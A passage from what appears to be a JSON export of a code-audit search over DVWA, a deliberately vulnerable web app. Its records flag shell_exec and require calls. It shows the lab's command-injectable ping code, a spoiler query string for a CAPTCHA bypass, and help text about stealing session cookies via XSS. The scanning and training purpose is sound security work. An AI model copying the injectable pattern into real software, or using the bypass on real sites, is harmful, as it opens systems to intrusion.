"match": "<span class=\"line-number\">75:</span> \t\t<span class=\"token variable\">$ids</span> <span class=\"token operator\">=</span> new <span class=\"token function\">IDS_Monitor</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$request</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$init</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">76:</span> \t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$ids</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">run</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">77:</span> \n<span class=\"line-number\">78:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token variable\">$result</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">isEmpty</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">79:</span> \t\t\trequire_once <span class=\"token string\">'IDS/Log/File.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">80:</span> \t\t\trequire_once <span class=\"token string\">'IDS/Log/Composite.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">81:</span> \n<span class=\"line-number\">82:</span> \t\t\t<span class=\"token variable\">$compositeLog</span> <span class=\"token operator\">=</span> new <span class=\"token function\">IDS_Log_Composite</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">83:</span> \t\t\t<span class=\"token variable\">$compositeLog</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">addLogger</span><span class=\"token punctuation\">(</span>IDS_Log_File<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token function\">getInstance</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$init</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">84:</span> \n<span class=\"line-number\">85:</span> \t\t\t<span class=\"token variable\">$compositeLog</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$result</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 80,
"start": 75,
"end": 86,
"severity": "unknown",
"note": ""
},
{
"id": 88,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/help/help.php",
"filetype": "php",
"search": "\\srequire",
"match": "<span class=\"line-number\">24:</span> \n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Low Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">26:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>The issue <span class=\"token keyword\">with</span> this CAPTCHA is that it is easily bypassed<span class=\"token punctuation\">.</span> The developer has made the assumption that all users will progress through screen <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> complete the CAPTCHA<span class=\"token punctuation\">,</span> <span class=\"token operator\">and</span> <span class=\"token keyword\">then</span>\n<span class=\"line-number\">27:</span> \t\t\tmove on <span class=\"token keyword\">to</span> the <span class=\"token keyword\">next</span> screen where the password is actually updated<span class=\"token punctuation\">.</span> By submitting the new password directly <span class=\"token keyword\">to</span> the change page<span class=\"token punctuation\">,</span> the user may bypass the CAPTCHA system<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">28:</span> \n<span class=\"highlight\"><span class=\"line-number\">29:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>The parameters required <span class=\"token keyword\">to</span> complete this challenge <span class=\"token keyword\">in</span> low security would be similar <span class=\"token keyword\">to</span> the following<span class=\"token punctuation\">:</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">30:</span> \t\t<span class=\"token operator\"><</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span><span class=\"token operator\">?</span><span class=\"token keyword\">step</span><span class=\"token operator\">=</span><span class=\"token number\">2</span><span class=\"token operator\">&</span>password_new<span class=\"token operator\">=</span>password<span class=\"token operator\">&</span>password_conf<span class=\"token operator\">=</span>password<span class=\"token operator\">&</span>Change<span class=\"token operator\">=</span>Change<span class=\"token operator\"><</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">33:</span> \n<span class=\"line-number\">34:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Medium Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>",
"line": 29,
"start": 24,
"end": 35,
"severity": "unknown",
"note": ""
},
{
"id": 139,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/help/help.php",
"filetype": "php",
"search": "\\srequire",
"match": "<span class=\"line-number\">30:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Medium Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">33:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span><span class=\"token keyword\">For</span> the medium level challenge<span class=\"token punctuation\">,</span> there is a check <span class=\"token keyword\">to</span> see where the last requested page came from<span class=\"token punctuation\">.</span> The developer believes <span class=\"token keyword\">if</span> it matches the current domain<span class=\"token punctuation\">,</span>\n<span class=\"line-number\">34:</span> \t\t\tit must of come from the web application so it can be trusted<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">35:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>It may be required <span class=\"token keyword\">to</span> link <span class=\"token keyword\">in</span> multiple vulnerabilities <span class=\"token keyword\">to</span> exploit this vector<span class=\"token punctuation\">,</span> such as reflective XSS<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">36:</span> \n<span class=\"line-number\">37:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">38:</span> \n<span class=\"line-number\">39:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>High Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">40:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span><span class=\"token keyword\">In</span> the high level<span class=\"token punctuation\">,</span> the developer has added an <span class=\"token string\">\"anti Cross-Site Request Forgery (CSRF) token\"</span><span class=\"token punctuation\">.</span> <span class=\"token keyword\">In</span> order by bypass this protection method<span class=\"token punctuation\">,</span> another vulnerability will be required<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>",
"line": 35,
"start": 30,
"end": 41,
"severity": "unknown",
"note": ""
},
{
"id": 140,
"file": "/home/chris/src/DVWA-master/vulnerabilities/csrf/help/help.php",
"filetype": "php",
"search": "\\srequire",
"match": "<span class=\"line-number\">35:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>It may be required <span class=\"token keyword\">to</span> link <span class=\"token keyword\">in</span> multiple vulnerabilities <span class=\"token keyword\">to</span> exploit this vector<span class=\"token punctuation\">,</span> such as reflective XSS<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">36:</span> \n<span class=\"line-number\">37:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">38:</span> \n<span class=\"line-number\">39:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>High Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">40:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span><span class=\"token keyword\">In</span> the high level<span class=\"token punctuation\">,</span> the developer has added an <span class=\"token string\">\"anti Cross-Site Request Forgery (CSRF) token\"</span><span class=\"token punctuation\">.</span> <span class=\"token keyword\">In</span> order by bypass this protection method<span class=\"token punctuation\">,</span> another vulnerability will be required<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">41:</span> \t\t<span class=\"token operator\"><</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>e<span class=\"token punctuation\">.</span>g<span class=\"token punctuation\">.</span> Javascript is a executed on the client side<span class=\"token punctuation\">,</span> <span class=\"token keyword\">in</span> the browser<span class=\"token operator\"><</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">42:</span> \n<span class=\"line-number\">43:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">44:</span> \n<span class=\"line-number\">45:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Impossible Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>",
"line": 40,
"start": 35,
"end": 46,
"severity": "unknown",
"note": ""
},
{
"id": 281,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/help/help.php",
"filetype": "php",
"search": "\\srequire",
"match": "<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>An attacker can use XSS <span class=\"token keyword\">to</span> send a malicious script <span class=\"token keyword\">to</span> an unsuspecting user<span class=\"token punctuation\">.</span> The end user's browser has no way <span class=\"token keyword\">to</span> know that the script should <span class=\"token operator\">not</span> be trusted<span class=\"token punctuation\">,</span>\n<span class=\"line-number\">15:</span> \t\t\t<span class=\"token operator\">and</span> will execute the JavaScript<span class=\"token punctuation\">.</span> Because it thinks the script came from a trusted source<span class=\"token punctuation\">,</span> the malicious script can access any cookies<span class=\"token punctuation\">,</span> session tokens<span class=\"token punctuation\">,</span> <span class=\"token operator\">or</span> other\n<span class=\"line-number\">16:</span> \t\t\tsensitive information retained by your browser <span class=\"token operator\">and</span> used <span class=\"token keyword\">with</span> that site<span class=\"token punctuation\">.</span> These scripts can even rewrite the content of the HTML page<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">17:</span> \n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>Because its a reflected XSS<span class=\"token punctuation\">,</span> the malicious code is <span class=\"token operator\">not</span> stored <span class=\"token keyword\">in</span> the remote web application<span class=\"token punctuation\">,</span> so requires some social engineering <span class=\"token punctuation\">(</span>such as a link via email<span class=\"token operator\">/</span>chat<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">19:</span> \n<span class=\"line-number\">20:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">21:</span> \n<span class=\"line-number\">22:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Objective<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">23:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>One way <span class=\"token operator\">or</span> another<span class=\"token punctuation\">,</span> steal the cookie of a logged <span class=\"token keyword\">in</span> user<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>",
"line": 18,
"start": 13,
"end": 24,
"severity": "unknown",
"note": ""
},
{
"id": 175,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/high.php",
"filetype": "php",
"search": "\\sshell_exec\\s*\\(",
"match": "<span class=\"line-number\">21:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_keys</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$substitutions</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$substitutions</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \n<span class=\"line-number\">23:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Determine OS <span class=\"token operator\">and</span> execute the ping command<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">24:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stristr</span><span class=\"token punctuation\">(</span> <span class=\"token function\">php_uname</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'s'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'Windows NT'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"highlight\"><span class=\"line-number\">26:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">27:</span> \t}\n<span class=\"line-number\">28:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">29:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token operator\">*</span>nix\n<span class=\"line-number\">30:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping -c 4 '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">31:</span> \t}",
"line": 26,
"start": 21,
"end": 32,
"severity": "unknown",
"note": ""
},
{
"id": 176,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/high.php",
"filetype": "php",
"search": "\\sshell_exec\\s*\\(",
"match": "<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"line-number\">26:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">27:</span> \t}\n<span class=\"line-number\">28:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">29:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token operator\">*</span>nix\n<span class=\"highlight\"><span class=\"line-number\">30:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping -c 4 '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">31:</span> \t}\n<span class=\"line-number\">32:</span> \n<span class=\"line-number\">33:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the end user\n<span class=\"line-number\">34:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>{$cmd}</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">35:</span> }",
"line": 30,
"start": 25,
"end": 36,
"severity": "unknown",
"note": ""
},
{
"id": 181,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/impossible.php",
"filetype": "php",
"search": "\\sshell_exec\\s*\\(",
"match": "<span class=\"line-number\">17:</span> \t\t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$octet</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$octet</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$octet</span><span class=\"token punctuation\">[</span><span class=\"token number\">2</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$octet</span><span class=\"token punctuation\">[</span><span class=\"token number\">3</span><span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \n<span class=\"line-number\">19:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Determine OS <span class=\"token operator\">and</span> execute the ping command<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">20:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stristr</span><span class=\"token punctuation\">(</span> <span class=\"token function\">php_uname</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'s'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'Windows NT'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">21:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"highlight\"><span class=\"line-number\">22:</span> \t\t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">23:</span> \t\t}\n<span class=\"line-number\">24:</span> \t\t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">25:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token operator\">*</span>nix\n<span class=\"line-number\">26:</span> \t\t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping -c 4 '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">27:</span> \t\t}",
"line": 22,
"start": 17,
"end": 28,
"severity": "unknown",
"note": ""
},
{
"id": 182,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/impossible.php",
"filetype": "php",
"search": "\\sshell_exec\\s*\\(",
"match": "<span class=\"line-number\">21:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"line-number\">22:</span> \t\t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t\t}\n<span class=\"line-number\">24:</span> \t\t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">25:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token operator\">*</span>nix\n<span class=\"highlight\"><span class=\"line-number\">26:</span> \t\t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping -c 4 '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">27:</span> \t\t}\n<span class=\"line-number\">28:</span> \n<span class=\"line-number\">29:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the end user\n<span class=\"line-number\">30:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>{$cmd}</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">31:</span> \t}",
"line": 26,
"start": 21,
"end": 32,
"severity": "unknown",
"note": ""
},
{
"id": 185,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/low.php",
"filetype": "php",
"search": "\\sshell_exec\\s*\\(",
"match": "<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'ip'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Determine OS <span class=\"token operator\">and</span> execute the ping command<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">8:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stristr</span><span class=\"token punctuation\">(</span> <span class=\"token function\">php_uname</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'s'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'Windows NT'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">9:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"highlight\"><span class=\"line-number\">10:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">11:</span> \t}\n<span class=\"line-number\">12:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token operator\">*</span>nix\n<span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping -c 4 '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t}",
"line": 10,
"start": 5,
"end": 16,
"severity": "unknown",
"note": ""
},
{
"id": 186,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/low.php",
"filetype": "php",
"search": "\\sshell_exec\\s*\\(",
"match": "<span class=\"line-number\">9:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"line-number\">10:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t}\n<span class=\"line-number\">12:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">13:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token operator\">*</span>nix\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping -c 4 '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">15:</span> \t}\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> the end user\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"<pre>{$cmd}</pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> }",
"line": 14,
"start": 9,
"end": 20,
"severity": "unknown",
"note": ""
},
{
"id": 189,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/medium.php",
"filetype": "php",
"search": "\\sshell_exec\\s*\\(",
"match": "<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$target</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_keys</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$substitutions</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$substitutions</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Determine OS <span class=\"token operator\">and</span> execute the ping command<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">stristr</span><span class=\"token punctuation\">(</span> <span class=\"token function\">php_uname</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'s'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'Windows NT'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Windows\n<span class=\"highlight\"><span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">20:</span> \t}\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">22:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token operator\">*</span>nix\n<span class=\"line-number\">23:</span> \t\t<span class=\"token variable\">$cmd</span> <span class=\"token operator\">=</span> <span class=\"token function\">shell_exec</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ping -c 4 '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$target</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">24:</span> \t}",
"line": 19,
"start": 14,
"end": 25,
"severity": "unknown",
"note": ""
},
{
"id": 190,
"file": "/home/chris/src/DVWA-master/vulnerabilities/exec/source/medium.php",
"filetype": "php",
"search": "\\sshell_exec\\s*\\(",
